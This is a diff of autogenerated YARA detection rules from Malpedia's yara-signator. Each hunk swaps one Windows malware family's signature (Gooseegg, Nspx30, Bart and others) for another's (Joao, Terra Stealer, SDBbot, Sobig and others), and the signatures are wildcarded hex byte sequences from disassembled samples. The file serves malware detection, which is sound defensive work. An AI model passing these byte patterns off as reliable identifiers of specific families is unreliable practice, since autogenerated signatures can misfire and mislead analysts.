-		$sequence_1 = { e340 ac c1e010 83f901 740b }
-		$sequence_2 = { 56 57 53 8b7508 8b7d0c 8b4d10 33db }
-		$sequence_3 = { 6a00 6a00 6a04 50 e8???????? 0bc0 }
-		$sequence_4 = { 042b aa c3 55 8bec }
-		$sequence_5 = { 68???????? e8???????? 68???????? 68???????? e8???????? 6804010000 }
-		$sequence_6 = { 2bf9 b03d f3aa 5b }
-		$sequence_7 = { 2bf9 b03d f3aa 5b 5f 5e }
-		$sequence_8 = { 0bc0 7426 6880000000 68???????? }
-		$sequence_9 = { 668945f2 c745f400000000 6a06 6a01 6a02 e8???????? 8bd8 }
+		$sequence_0 = { 85c0 7410 6a00 ff35???????? }
+		$sequence_1 = { ff15???????? 50 ff15???????? 8d45f0 33f6 }
+		$sequence_2 = { 51 51 8d45f8 c745f808000000 50 ff15???????? ff15???????? }
+		$sequence_3 = { ff15???????? 50 ff15???????? 8d45f0 33f6 50 }
+		$sequence_4 = { 85c0 7410 6a00 ff35???????? ff15???????? }
+		$sequence_5 = { 50 6a28 ff15???????? 50 ff15???????? 8d45f0 33f6 }
+		$sequence_6 = { 7410 6a00 ff35???????? ff15???????? }
+		$sequence_7 = { 8d45f8 50 ff15???????? ff7508 }
+		$sequence_8 = { 51 8d45f8 c745f808000000 50 ff15???????? ff15???????? }
+		$sequence_9 = { 8d45f8 50 ff15???????? ff7508 ff15???????? }
 
 	condition:
-		7 of them and filesize < 245760
+		7 of them and filesize < 1054720
 }
-rule MALPEDIA_Win_Gooseegg_Auto : FILE
+rule MALPEDIA_Win_Joao_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d8132454-9f6e-5d45-ae4a-e06046e4b7c3"
+		id = "a574fe28-a1f8-553e-b910-02d4312c2eca"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gooseegg"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gooseegg_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.joao_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "8983b8f0c526551207a00c2d480777794912cb3a61999ef4b05b249edd7a0003"
+		logic_hash = "26a2c27da2ce5891d333b17daccfb50c0846c7c8910a76f91916cef0b5d7e33f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133637,34 +133440,34 @@ rule MALPEDIA_Win_Gooseegg_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4d85c9 488d3d797c0000 488bc2 4c8bfa 4d0f45d1 4885d2 418d6b01 }
-		$sequence_1 = { 488d05f1550100 c3 488d05f1550100 c3 4883ec28 e8???????? }
-		$sequence_2 = { eb02 33db 4c8d357194ffff 4885db }
-		$sequence_3 = { ff15???????? 48832300 4883c308 488d05b9440100 483bd8 }
-		$sequence_4 = { 488d35abe70000 48895c2420 488d056fff0000 483bd8 7419 483933 740e }
-		$sequence_5 = { 488b05???????? 488d150ef7ffff 483bc2 7423 65488b042530000000 }
-		$sequence_6 = { 4c8d0dd17b0000 33c9 4c8d05c47b0000 488d15c57b0000 e8???????? 4885c0 740b }
-		$sequence_7 = { 488945e0 895128 488d0dbb940000 488b45d8 488908 488d0d0d190100 488b45d8 }
-		$sequence_8 = { 8bfb e9???????? e8???????? 488d1df2370100 }
-		$sequence_9 = { 85c0 0f849e000000 4c8d051f330100 ba00020000 }
+		$sequence_0 = { e8???????? 83c404 c705????????0f000000 891d???????? 881d???????? 8b4df4 64890d00000000 }
+		$sequence_1 = { 5d c20c00 68???????? 53 e8???????? }
+		$sequence_2 = { 83c004 8955d0 8945cc 3bd1 }
+		$sequence_3 = { e8???????? 8845d4 c745fc01000000 84c0 0f84dc000000 8b16 8d4de4 }
+		$sequence_4 = { 50 e8???????? 83c414 8b4508 c1e005 03c3 83e7e0 }
+		$sequence_5 = { c1e005 03c3 83e7e0 03fb 894608 897e04 891e }
+		$sequence_6 = { 52 6a40 6a20 68???????? ff15???????? }
+		$sequence_7 = { 83ec08 53 56 8b7510 33c0 }
+		$sequence_8 = { 8bc6 2bc7 5f 5e 5b 5d c20c00 }
+		$sequence_9 = { 897dfc e8???????? 8d55f8 52 8bce c745f808000000 }
 
 	condition:
-		7 of them and filesize < 217088
+		7 of them and filesize < 2867200
 }
-rule MALPEDIA_Win_Nspx30_Auto : FILE
+rule MALPEDIA_Win_Terra_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b7c1fb90-4e2e-567c-b71f-a04015c19cf0"
+		id = "234ed187-f851-554b-a630-3727e334e709"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nspx30"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nspx30_auto.yar#L1-L307"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.terra_stealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "21c2ef2f3120756bc5bb636c0145196e56cf18e54f32669d823d96a566a0c7b3"
+		logic_hash = "ba7828bda62d9e0272e6a0dfd1c69067ed7e871d009d7d515799e6dd5814f419"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -133676,53 +133479,32 @@ rule MALPEDIA_Win_Nspx30_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f3ab 66ab aa b06c }
-		$sequence_1 = { 0f8418030000 8b8530e5ffff 8b0485384c0410 f644060480 0f8400030000 e8???????? }
-		$sequence_2 = { 8903 c7831400080000000000 eb58 ff15???????? 8bc8 8b44240c }
-		$sequence_3 = { 6a04 6800100000 03c3 57 50 ff5508 }
-		$sequence_4 = { 8bf0 85db 742e 85ff }
-		$sequence_5 = { 66c78424d80000007300 66c78424de0000006100 66c78424e20000006f00 66c78424e60000002100 66c78424ea0000006500 66c78424ec0000007700 66c78424ee0000003a00 }
-		$sequence_6 = { 8b45f8 50 e8???????? 8945a8 688e4e0eec }
-		$sequence_7 = { 6689b4249c000000 52 be32000000 6a00 51 66c74424787b00 66c744247a3300 }
-		$sequence_8 = { 0f8c89010000 8b4c2410 8b11 8b420c 8b7a08 }
-		$sequence_9 = { 33c0 e9???????? 8b550c 52 6a14 e8???????? }
-		$sequence_10 = { 5e 7426 40 c60057 40 c60049 40 }
-		$sequence_11 = { 833800 0f8494010000 ff750c ff7508 e8???????? 8bf0 }
-		$sequence_12 = { 8b44240c 85c0 7460 53 ba04000000 }
-		$sequence_13 = { e8???????? 8b0f 8bc1 c1f805 83e11f 8b0485384c0410 c1e106 }
-		$sequence_14 = { 83ec0c 53 8b5c2414 56 57 6a01 }
-		$sequence_15 = { b843000000 66898c24c0000000 66898c24ce000000 66898c24d2000000 }
-		$sequence_16 = { 6689bc24fe000000 6689bc2400010000 6689b42402010000 66c78424040100004500 66c78424080100003300 66c784240a0100004500 }
-		$sequence_17 = { 6689444ffe 3bcb 72e7 e9???????? 8b7c2418 33c9 85db }
-		$sequence_18 = { bf???????? 83c9ff 33c0 6a5c }
-		$sequence_19 = { 8b0495384c0410 83c702 ff3418 ff15???????? 85c0 750e ff15???????? }
-		$sequence_20 = { 894dfc 8b55fc 8b4508 034220 8945ec }
-		$sequence_21 = { 8b1481 8955d8 8b4508 0345d8 eb04 eba4 }
-		$sequence_22 = { ffd2 c7461000000000 8b4608 53 8b5c2410 85c0 }
-		$sequence_23 = { 83c404 c745fcffffffff 833d????????00 8b07 }
-		$sequence_24 = { c7402420120010 c7402860120010 33c0 5e c20800 6879270000 ff15???????? }
-		$sequence_25 = { b801000000 5b 81c410030000 c20c00 5f 5e }
-		$sequence_26 = { 5b 754a c7002c000000 895004 895008 c7400ca0120010 }
-		$sequence_27 = { 83c9ff 33c0 c644240c57 c644240d69 c644240e6e c644240f64 c64424106f }
-		$sequence_28 = { 6a00 ff15???????? 8bfb 83c9ff 33c0 b25c f2ae }
-		$sequence_29 = { 7c86 5f 5d 5e 5b }
-		$sequence_30 = { 57 66896c2436 66896c2446 8d4c2414 bb38000000 be2d000000 }
+		$sequence_0 = { 85c0 0f8523030000 488b0f 4885c9 7405 e8???????? 4180fc05 }
+		$sequence_1 = { e8???????? 488983f0120000 4885c0 7456 41b80f000000 488d15302f0900 488bcb }
+		$sequence_2 = { eb04 4c8b7d28 4533c9 4533c0 488d1525861d00 488d4c2478 ff15???????? }
+		$sequence_3 = { ffca 84c0 7425 8bc8 410fb600 420fb6843840061f00 4238843940061f00 }
+		$sequence_4 = { 0f8c6effffff 4533c9 418b5708 498bc1 8b7e08 85d2 498bcc }
+		$sequence_5 = { ffc0 84c9 75e9 4863c8 4881f9f4010000 0f8339070000 488d8550010000 }
+		$sequence_6 = { eb24 498b4e10 4885c9 7415 0f1f00 8b4164 2403 }
+		$sequence_7 = { eb07 896b2c c6430144 488bc3 488b5c2478 4883c430 415d }
+		$sequence_8 = { e9???????? 488d8ae80f0000 e9???????? 488d8a00100000 e9???????? 488d8a18100000 e9???????? }
+		$sequence_9 = { e9???????? 488b5308 488d05d334f3ff 48ff42f8 4c8b4318 488b3b 4981f8ffffff7f }
 
 	condition:
-		7 of them and filesize < 3789824
+		7 of them and filesize < 4621312
 }
-rule MALPEDIA_Win_Comlook_Auto : FILE
+rule MALPEDIA_Win_Transbox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "248fcbac-27be-588f-a9f5-d4bcd5003e90"
+		id = "587785a3-ca04-5ed2-9e1f-d44127f3688f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.comlook"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.comlook_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.transbox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.transbox_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "342d3eba65a3a3eb715f8cb01d2789f76a6de2adfe9c491e43fe2b64805812f2"
+		logic_hash = "5d7fecd2b9b1e3ab63215aebd667fbd9c5d2815341d593f4c4a09feacf699ae3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133736,32 +133518,32 @@ rule MALPEDIA_Win_Comlook_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd2 3bf4 e8???????? b807000000 e9???????? 837db000 741f }
-		$sequence_1 = { ff15???????? 83c404 3bf4 e8???????? 8b4508 c7400800000000 33c9 }
-		$sequence_2 = { e9???????? 8b55f8 83ba5007000000 750a 837dbc00 0f8438020000 c78554ffffff00000000 }
-		$sequence_3 = { e9???????? 68df010000 68???????? 6a0c 6a05 e8???????? 8b87c4000000 }
-		$sequence_4 = { eb0a c785c8feffff44f72010 8b5508 83ba7403000000 7411 8b4508 8b8874030000 }
-		$sequence_5 = { c745f000000000 6a00 e8???????? 83c404 8945e8 8955ec c745e400000000 }
-		$sequence_6 = { eb03 894dbc 8b4de4 8b55d0 8bc2 83f910 7303 }
-		$sequence_7 = { eb0a c785b4eeffff518c1e10 837d1400 740c c785b0eeffff70191e10 eb0a c785b0eeffff518c1e10 }
-		$sequence_8 = { e9???????? 6a02 68???????? 6a01 8b5508 52 e8???????? }
-		$sequence_9 = { eb11 8b5518 8b4510 33c9 3b4218 0f9fc1 894ddc }
+		$sequence_0 = { 8bf1 8bda 57 837e1408 }
+		$sequence_1 = { 33d2 8b5d08 8955fc 8945e4 8945d8 8955e8 395104 }
+		$sequence_2 = { 8d4db8 e8???????? 8b35???????? 3b35???????? }
+		$sequence_3 = { 74e0 6a04 8d85f8fbffff 50 6a49 6a00 ff964c010000 }
+		$sequence_4 = { f7fb 56 8bf0 bbe0077e00 8bc3 2bc6 83f801 }
+		$sequence_5 = { 57 8bf1 33ff 6804010000 57 8d4610 c706???????? }
+		$sequence_6 = { 894608 85c0 74e0 6a04 8d85f8fbffff 50 6a49 }
+		$sequence_7 = { 8985d8faffff 8b8544faffff 8985dcfaffff 397e14 7204 8b16 }
+		$sequence_8 = { e8???????? 83c420 b812000000 33d2 8a900c530110 6683bc96760a000000 7506 }
+		$sequence_9 = { 8d8504e1ffff 89bd44e1ffff 50 33db 89b540e1ffff 53 }
 
 	condition:
-		7 of them and filesize < 4553728
+		7 of them and filesize < 288768
 }
-rule MALPEDIA_Win_Mechanical_Auto : FILE
+rule MALPEDIA_Win_Breakthrough_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f673020e-2414-508c-b896-8bd1153a2a5f"
+		id = "52cb4cda-5730-54cc-9d0c-9a1defab8d55"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mechanical_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.breakthrough_loader_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "bdb95de618c80d698fcb0c6f336b0430b26a5d0b33d6a5403bc772ebe314b16e"
+		logic_hash = "4417981ceb1c9a0093d9616e44b7782cd49e18f4737822a85a59217b8658f0b2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133775,38 +133557,32 @@ rule MALPEDIA_Win_Mechanical_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 03c7 3bca 72ed 5f }
-		$sequence_1 = { 4883c201 4983e901 0f855dfeffff 488d9424000a0000 }
-		$sequence_2 = { 030495c0e54200 eb05 b8???????? f6400420 }
-		$sequence_3 = { 4883ec28 488d15056a0200 e8???????? 4885c0 }
-		$sequence_4 = { 0f84e4e30000 488b8500730200 488d8c2410600000 33d2 488901 8b8508730200 41b8f5000000 }
-		$sequence_5 = { 0401 3cbe 8844240b 76e2 }
-		$sequence_6 = { 033485c0e54200 8b45e4 8b00 8906 }
-		$sequence_7 = { 03ce c6840c3801000000 8d8424a05c0000 33f6 }
-		$sequence_8 = { 488bf3 48c1fe05 4c8d2547e50000 408afb 83e71f 48c1e706 }
-		$sequence_9 = { 00686c 42 0023 d18a0688078a }
-		$sequence_10 = { 03c1 1bc9 0bc1 59 e9???????? e8???????? ff742404 }
-		$sequence_11 = { 4585c0 0f84b6010000 488d9424f05d0000 458bc8 66666690 66666690 0fb602 }
-		$sequence_12 = { 033485c0e54200 c745e401000000 33db 395e08 }
-		$sequence_13 = { 0fb785107a0200 66894108 0fb685127a0200 88410a 488d8c248b010000 }
-		$sequence_14 = { 33d2 41b803010000 4488a42460430000 488905???????? e8???????? 4c8d1de50a0200 498bcc }
-		$sequence_15 = { 4489642430 4488a424100b0000 e8???????? 4c8d1dfcd60100 }
+		$sequence_0 = { eb06 8b3d???????? 8b4df4 85c9 7403 }
+		$sequence_1 = { 50 57 ff15???????? 85c0 740a ba???????? e8???????? }
+		$sequence_2 = { 83c408 83f8ff 742a 8b75f8 8bce 8935???????? }
+		$sequence_3 = { ff5220 83e800 7412 83e801 7411 8b4c2424 }
+		$sequence_4 = { 56 57 8965f0 8955dc bb???????? 895de4 33ff }
+		$sequence_5 = { 7408 8b10 8bc8 6a01 ff12 5f 5e }
+		$sequence_6 = { 8b048540354500 f644012880 745d 8d45d8 50 ff75e4 ff15???????? }
+		$sequence_7 = { 85c0 7fb4 837dc810 8d4db4 0f434db4 33c0 }
+		$sequence_8 = { ff75e4 e8???????? 8b7508 c746140f000000 }
+		$sequence_9 = { 895de4 8b049d40354500 8945d4 8955e8 8a5c1029 }
 
 	condition:
-		7 of them and filesize < 434176
+		7 of them and filesize < 753664
 }
-rule MALPEDIA_Win_Webc2_Div_Auto : FILE
+rule MALPEDIA_Win_Atmspitter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0487cd24-3efb-59f7-a789-643d02cfd1b0"
+		id = "6677a06d-f51d-5f9e-9075-cbbb34c35eda"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_div_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.atmspitter_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "fd0dce640f74e7a720d2663bbcad05a022471937161b3c94d0276bbf1eb69f1b"
+		logic_hash = "bc5ce97320d3edf2cd777ada69ace7755633451b31f436076d0e817156126e74"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133820,32 +133596,32 @@ rule MALPEDIA_Win_Webc2_Div_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7474 56 6800000080 56 56 }
-		$sequence_1 = { 8078056e 7512 80780663 750c 80780765 7506 }
-		$sequence_2 = { 8d7d02 83c9ff c70001000000 8d5008 33c0 f2ae f7d1 }
-		$sequence_3 = { c3 55 e8???????? 59 33c0 ebf0 81ec10020000 }
-		$sequence_4 = { 7573 80780661 756d 80780766 }
-		$sequence_5 = { 7f09 0fbed0 83ea17 89148e 8d6901 bf16000000 8bc5 }
-		$sequence_6 = { 6a20 53 ffd6 59 85c0 }
-		$sequence_7 = { ff742410 eb14 817c2410808d5b00 771a 8b442414 }
-		$sequence_8 = { 83e803 bf???????? 80240100 83c9ff 33c0 f2ae f7d1 }
-		$sequence_9 = { 8b048e 8d1c9510114000 8b17 2bc2 99 }
+		$sequence_0 = { c70009000000 e8???????? ebd1 8bc8 c1f905 8d3c8d60da4000 }
+		$sequence_1 = { 57 8bc2 c1f805 8b048560da4000 8bfa }
+		$sequence_2 = { c686c800000043 c6864b01000043 c7466850c44000 6a0d e8???????? 59 8365fc00 }
+		$sequence_3 = { ff15???????? 6a02 6a00 8bf8 6a00 57 }
+		$sequence_4 = { 7d0d 8a4c181c 888870c64000 40 }
+		$sequence_5 = { 50 68???????? e8???????? 83c408 68???????? e8???????? 8b4528 }
+		$sequence_6 = { 83f914 0f8798000000 0fb691b0854000 ff249588854000 }
+		$sequence_7 = { 0f8c260a0000 8d42e0 3c58 770f 0fbec2 0fbe8060914000 83e00f }
+		$sequence_8 = { 56 57 50 c745fc00000000 ffd3 }
+		$sequence_9 = { 53 8b1d???????? 56 57 50 c745fc00000000 }
 
 	condition:
-		7 of them and filesize < 32768
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Disk_Knight_Auto : FILE
+rule MALPEDIA_Win_Sdbbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2e5932a4-2261-529e-8603-e7381cbcd593"
+		id = "e5ddf82d-6516-5715-9fa8-b1a6bdbb883d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.disk_knight"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.disk_knight_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sdbbot_auto.yar#L1-L180"
 		license_url = "N/A"
-		logic_hash = "94d53be36645294fa895fc3e62b424a992d83f6ddb436852c2ddc8dd29bf34d2"
+		logic_hash = "a7c9bbefe17c51ab7bd282fe70d8133f645f1f7f65d3be7e33bd1c26f76ee007"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133859,32 +133635,39 @@ rule MALPEDIA_Win_Disk_Knight_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 8b45c8 50 ff15???????? 8945ac eb07 c745ac00000000 }
-		$sequence_1 = { 8bd0 8d4dd4 ffd6 50 68???????? ffd7 8d4d8c }
-		$sequence_2 = { ff15???????? 8bd0 8d4da0 ffd6 8d45a4 50 ff15???????? }
-		$sequence_3 = { c7458001000080 33d2 8d4db0 ff15???????? ba???????? 8d4db4 ff15???????? }
-		$sequence_4 = { 8b16 8d8578ffffff 50 56 ff92b8070000 3bc7 7d0e }
-		$sequence_5 = { 8975c8 8d4db0 ff15???????? 8b4dc8 33ff 3bcf 741c }
-		$sequence_6 = { 83bdc4feffff00 7d23 6a58 68???????? 8b8dc8feffff 51 8b95c4feffff }
-		$sequence_7 = { 8d55dc 51 52 897d80 c78578ffffff00000000 89bd70ffffff ff15???????? }
-		$sequence_8 = { 6880000000 ff15???????? 83c41c 8b4dc8 51 8d9544ffffff 52 }
-		$sequence_9 = { c785bcfeffff01000000 8b4d0c 833900 7455 8b550c 8b02 66833801 }
+		$sequence_0 = { 03f3 8b17 03d3 33c9 8a02 }
+		$sequence_1 = { 8b5df0 8bbb80000000 03fe 897dec 833f00 0f847d000000 }
+		$sequence_2 = { 2b7b34 8955ec 85d2 0f84ae000000 8b83a0000000 03c6 }
+		$sequence_3 = { 56 57 c745e400000000 895df4 895de0 }
+		$sequence_4 = { 8945fc 85c0 0f84c2010000 0f1f840000000000 8b7028 33c9 }
+		$sequence_5 = { 8b5b10 8b433c 8b441878 03c3 8945dc 8b7820 }
+		$sequence_6 = { 03c1 8955ec 8945e4 85d2 0f8560ffffff 8b5df0 8b7328 }
+		$sequence_7 = { 7403 4f ebe2 64a130000000 897df8 }
+		$sequence_8 = { c3 803d????????00 750c c605????????01 }
+		$sequence_9 = { 664503de 4983c004 4983c102 664585db 75ac 4c8bb42480000000 }
+		$sequence_10 = { 41bb01000000 48897c2438 4c89ac2488000000 488b4818 4c8b7920 }
+		$sequence_11 = { 41b9ffff0000 458d6b03 66660f1f840000000000 498b5750 33c0 450fb74748 }
+		$sequence_12 = { 48ffc2 8801 488d4901 4983e801 }
+		$sequence_13 = { 7446 4d03cf 0f1f840000000000 418b49f8 49ffca 418b11 4903ce }
+		$sequence_14 = { 418b11 4903ce 458b41fc 4903d5 4d85c0 7419 0f1f8000000000 }
+		$sequence_15 = { 488bf0 4885c0 7474 8b7d10 8b5d00 4903fe }
+		$sequence_16 = { 0f84a7000000 0f1f840000000000 8b4304 85c0 }
 
 	condition:
-		7 of them and filesize < 868352
+		7 of them and filesize < 1015808
 }
-rule MALPEDIA_Win_Bart_Auto : FILE
+rule MALPEDIA_Win_Sobig_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "69293053-9c73-5e85-bfc8-1bda4f3480af"
+		id = "f2079ef3-4c71-5dab-833c-5773ab6ef02f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bart_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobig"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sobig_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "3bd63c0862e680fa10847ed0fefa7078e2170f430f6b6047eb709673a0606c78"
+		logic_hash = "0c745bccdca469dd967ba05a41b0d6b9484e837d88e70b86ce4dd51c26e4309d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133898,32 +133681,32 @@ rule MALPEDIA_Win_Bart_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 74d1 68ffffff00 50 8d45d8 8bce 50 e8???????? }
-		$sequence_1 = { 8d4dbc e8???????? 8b8558ffffff 8d8d7cffffff 8b9550ffffff 0fb600 }
-		$sequence_2 = { 8d4dd4 eb55 84db 755a 6a02 5a 8d4de4 }
-		$sequence_3 = { 48 0fb7c0 6683f801 7e7e }
-		$sequence_4 = { 53 56 57 8d45b8 8955ec 8bf9 50 }
-		$sequence_5 = { ffb63c010000 53 ffd7 83c40c 3b461c 75e1 33c0 }
-		$sequence_6 = { 8bfa 8bd9 384601 7e11 }
-		$sequence_7 = { 8bec 53 56 8bd9 57 33ff 397b48 }
-		$sequence_8 = { 0f840c010000 57 ff15???????? 6800ff0000 ffd3 8bf8 85ff }
-		$sequence_9 = { 50 8b83b0000000 ffd0 8b95c8feffff 8b8db8feffff 53 56 }
+		$sequence_0 = { c645fc01 e8???????? 56 8d4dc8 885dfc e8???????? 834dfcff }
+		$sequence_1 = { 48 85c9 742e 53 40 57 }
+		$sequence_2 = { 50 e8???????? 83ec10 8d45b0 8bcc 8965c4 50 }
+		$sequence_3 = { 034e18 83c418 c645fc03 51 }
+		$sequence_4 = { 7ced 85f6 7e15 8bce 8d75c0 8bc1 8bfb }
+		$sequence_5 = { 8d4ddc e8???????? 85c0 0f84a0000000 68???????? 8d4ddc }
+		$sequence_6 = { 7505 b8???????? 50 8d8544fbffff 68???????? 50 ff15???????? }
+		$sequence_7 = { e8???????? e9???????? 6a10 8d45ac 6a00 50 e8???????? }
+		$sequence_8 = { 83c320 3b7e04 7cee 5b ff36 e8???????? 59 }
+		$sequence_9 = { 3b7e08 7ce6 83c8ff 5f 5e 5b c20400 }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Biscuit_Auto : FILE
+rule MALPEDIA_Win_Unidentified_115_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4b580404-4186-5ded-b852-ff8cc2d91924"
+		id = "3a1ba5f2-6d8b-53d1-afa7-3efb81c22fc0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.biscuit_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_115"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_115_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "21658c2822d8c2da349d55326a2fbe01a4e5603d4a188c5f0ab05c786709117d"
+		logic_hash = "6028b5eb1b27194aba70c1eb50e5d4032510571ea08ddcbdb15ab7d8877e12da"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -133937,32 +133720,32 @@ rule MALPEDIA_Win_Biscuit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c6040800 8b4c241c 5f c745300030c084 8bc5 5e }
-		$sequence_1 = { 8b95b8b7ffff 52 e8???????? 83c404 eb22 8b85d4daffff 83e801 }
-		$sequence_2 = { 8d8dd0daffff 51 b9???????? e8???????? 25ff000000 85c0 }
-		$sequence_3 = { eb1f 8b45f0 83e801 898584b6ffff 8b8d84b6ffff 8a11 }
-		$sequence_4 = { 8b8d74b7ffff 3b4de0 0f83f5000000 8b55e0 2b9574b7ffff 899588b7ffff 8b857cb7ffff }
-		$sequence_5 = { 83bd28ffffff00 7502 eb71 8b8528ffffff 33c9 }
-		$sequence_6 = { 03f0 03d8 3bb42458100000 734f 6800100000 8d442444 53 }
-		$sequence_7 = { 8d8da0daffff e8???????? 8d9510b9ffff 52 b9???????? e8???????? }
-		$sequence_8 = { 8b8db0feffff 51 e8???????? 83c404 eb1f 8b55e4 83ea01 }
-		$sequence_9 = { 83e901 898d34feffff 8b9534feffff 8a02 2c01 8b8d34feffff }
+		$sequence_0 = { 488945f0 488b05???????? 488945f8 ff15???????? 488d0d72f80000 ff15???????? }
+		$sequence_1 = { 488d0d8f150100 eb62 488b1d???????? 4c8d4c2428 ba01000000 4889c1 41b840000000 }
+		$sequence_2 = { 488b13 4889f1 4883c308 e8???????? ebea 4881c420010000 5b }
+		$sequence_3 = { ffd3 488d1590f60100 4889c1 e8???????? b901000000 e8???????? 90 }
+		$sequence_4 = { 48893d???????? 498dbe50010000 48891d???????? 488d1d80dc0300 4c891d???????? 4c8d1d72e10300 }
